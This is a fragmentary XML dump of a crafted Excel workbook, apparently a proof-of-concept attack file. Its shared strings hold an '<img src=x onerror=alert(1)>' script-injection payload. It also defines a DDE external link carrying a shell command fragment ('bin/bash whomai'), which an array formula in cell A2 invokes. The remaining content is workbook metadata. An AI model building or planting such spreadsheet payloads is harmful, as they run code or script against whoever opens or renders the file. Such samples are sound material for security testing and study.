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D4EA8F75-2F1E-45A9-91B7-AD0AE0104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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
  <si>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&lt;img src=x onerror=alert(1)&gt;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</si>
</sst>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4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bin/bash whomai">
    <ddeItems>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
      <ddeItem name="Z0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  <row r="2" spans="1:1" ht="15.75" x14ac:dyDescent="0.25">
      <c r="A2" s="1" t="e" cm="1">
        <f t="array" ref="A2">[1]!Z0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Tùng Nguyễn</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-19T08:46:06Z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2023-12-19T08:32:56Z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7b961ea4-a7ab-4171-bda2-10c25fb799b8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ActionId">
    <vt:lpwstr>15fe9ecf-cd8d-43ba-a92c-3a220a8e2b87</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_defa4170-0d19-0005-0004-bc88714345d2_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>